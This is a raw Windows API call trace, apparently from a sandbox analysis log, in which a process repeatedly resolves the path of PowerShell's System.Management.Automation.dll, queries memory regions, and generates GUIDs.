	[0430.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.524] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.524] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.524] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.525] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.525] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.525] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.525] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.525] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.525] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.526] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.526] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.526] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.526] VirtualQuery (in: lpAddress=0x26b700, lpBuffer=0x26c5c0, dwLength=0x30 | out: lpBuffer=0x26c5c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.526] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.526] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.527] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.527] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.527] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x56f6576c, Data2=0x57bb, Data3=0x4bba, Data4=([0]=0xb4, [1]=0x92, [2]=0xd5, [3]=0x3d, [4]=0xdf, [5]=0x1b, [6]=0x5a, [7]=0x87))) returned 0x0
	[0430.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.531] VirtualQuery (in: lpAddress=0x26bad0, lpBuffer=0x26c990, dwLength=0x30 | out: lpBuffer=0x26c990*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.531] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.531] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.531] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.531] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.532] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.628] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.628] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.628] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.628] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.628] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.629] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.629] VirtualQuery (in: lpAddress=0x26b700, lpBuffer=0x26c5c0, dwLength=0x30 | out: lpBuffer=0x26c5c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.629] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.629] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.629] VirtualQuery (in: lpAddress=0x26ba30, lpBuffer=0x26c8f0, dwLength=0x30 | out: lpBuffer=0x26c8f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.630] VirtualQuery (in: lpAddress=0x26bac0, lpBuffer=0x26c980, dwLength=0x30 | out: lpBuffer=0x26c980*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.630] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xcb71f4d6, Data2=0x27c, Data3=0x4197, Data4=([0]=0xb1, [1]=0xcd, [2]=0x60, [3]=0x1a, [4]=0x53, [5]=0x62, [6]=0x79, [7]=0xeb))) returned 0x0
